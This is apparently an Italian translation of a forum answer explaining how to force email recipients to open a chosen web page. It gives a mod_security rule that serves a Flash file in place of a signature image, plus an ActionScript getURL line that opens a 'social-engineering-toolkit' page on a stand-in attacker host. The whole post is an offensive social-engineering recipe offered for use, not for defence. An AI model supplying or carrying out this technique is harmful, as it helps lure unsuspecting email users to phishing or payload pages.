gowenfawr ha dato una risposta concisa, tuttavia, farò un ulteriore passo avanti. A seconda del client di posta elettronica che l'utente ha, è possibile costringerli a visitare un sito come se fosse o meno. Implica l'incorporamento di JPG o GIF, un server e mod_security.
Nell'istanza descritta sopra, potresti inserire " logo.jpg " nella tua firma. Se l'utente ha un'e-mail che consente la visualizzazione di contenuti remoti (html nell'e-mail), puoi dire a mod_security: "hey, ogni volta che qualcuno chiede logo.jpg, dai loro logo.swf " dove logo .swf esegue un getURL per aprire un browser.
SecFilterSelective REQUEST_URI "/logo.jpg" redirect:http://loaded-web-site.com/logo.swf
All'interno del file swf puoi inserire tutto ciò che vuoi:
getURL("social-engineering-toolkit-page.html", "_blank", "GET");
Tutto dipende da quanto tempo si vuole spendere, quanta fatica ci metti, ecc.